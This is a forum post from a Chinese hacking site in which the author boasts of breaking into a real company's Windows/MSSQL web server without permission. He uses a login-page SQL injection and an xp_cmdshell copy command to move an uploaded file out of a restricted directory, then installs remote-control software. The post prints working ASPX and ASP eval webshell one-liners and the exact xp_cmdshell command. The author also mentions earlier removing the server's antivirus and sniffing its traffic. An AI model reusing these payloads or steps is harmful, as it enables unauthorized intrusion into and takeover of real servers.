搜索
查看: 694|回复: 0

详细SQL注入到copy跳出限制目录的渗透测试

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-10-15 20:30:59 | 显示全部楼层 |阅读模式
前言:
这个站我以前已经拿过一次了,后来掉了,以前是找了个地方上传,但是有目录限制,后来用以前发的那个../跳目录跳走了,但是又提示进程占用什么的,然后过了一会儿马竟然变成0KB了,估计有什么东西在作怪,然后跑去贴吧发帖,有个人给我了一个aspx大马,传上去就分分钟秒杀了,提上去有360全套,我全给他卸载了,然后嗅探了,然后服务器就挂了,然后我就上不去了,然后就不管他了,然后时隔半年的我又想起来上去看看内网渗透了,我本来想用当初的方法再来一遍,可是我忘记当时是从哪里上传的了,我想了半天也没想起来,如是有了下面的渗透
目标信息:
Windows 2003
内网
Mssql 2005数据库



显示发现了一枚后台POST注入
由于有验证码,工具跑不了,但是呢,我又不会手工
所以呢,就去百度
参考的是这篇文章:http://www.2cto.com/Article/201111/110527.html
照着他的过程一下一下的去爆密码

先爆一下

然后他竟然全部出来了
然后就普通的注入,注入到密码

太特么高兴了,进了后台再按照我原来的步骤,分分钟拿下啊,哈哈
结果呢

这次我不能日狗了,我要日这个站了
唉,这条路走不通,换一条路吧
原来我拿的时候记得有个二级目录的,可以上传任意文件,但是目录被限制了


给你们看看是个什么情况吧
对于这玩意儿,当初我抓包改包也换不了目录,知道没戏,就不去管它了
然后抽根烟。吃了个柚子,就去看看注入还有没有戏,先看了个权限


我觉得这就是运气
不过问题又来了,我能用这个做些什么呢?
加用户登不上去,他是内网的
不过可以试试写shell
根据先前的报错信息
找路径
我觉得就是这个了
先写个TXT试试手感


见证奇迹的时刻来了

然而并没什么卵用,没写进去,
然后我就没想法了。。。
再来一根烟
分析分析不行的原因
1.语句错了
2.路径错了
3.不明错误
反正语句我是复制的,他都能写进去我也应该能啊
那就看路径了,我以前发帖找大马的时候好像发过截图,我看看那时候我把马传到哪个路径的,然后我就打开我的手机贴吧,找我的发帖记录

然后我就找到嘞,给张路径特写图

虽然是AV画质,但是路径那几个大字还是很突出的,哈哈
实际路径原来是e:\wwwroot\
真特么坑
再写一次


这下就没跑了,哈哈,果断写aspx一句话进去

麻痹的,不行啊,
用的是这个一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
我怀疑是语句有问题
一句话吧语句给打乱了
所以我就分来写
<%@ Page Language="Jscript"%>吧这个写TXT看看能不能写,结果是可以的
<%eval(Request.Item["pass"],"unsafe");%>这个也可以的
那就奇了怪了
<%@ Page Language="Jscript"%%eval(Request.Item["pass"]这样也是可以写的,
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"]这样就不能写了
我怎么有种感觉是在给木马免杀呀,一个一个的在找特征码
我asp的一句话<%eval request(1)%>是可以写的
我想试试写大马,也写不进去,小马也写不进去
我没辙了。。。
喝口牛奶
看看能不能执行CMD
试着copy了一下刚才写进去的TXT
然后去百度mssql执行CMD的语句
最终找了了一篇
http://blog.csdn.net/eldn__/article/details/8247166

;exec master..xp_cmdshell 'copy e:\wwwroot\22.txt e:\wwwroot\222.txt'--

能执行命令
哈哈,
这下子灵感一下就冒出来了
我能上传,我能复制,那我岂不是能换目录了?
赶紧去那个二级目录传个马儿
然后回来果断copy到根目录

嗯哼?这下你不就死定了?
然后凭我的记忆有SA的,是administratorS组权限,不过我也懒得转发了,直接上远控了
一切就都结束了!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表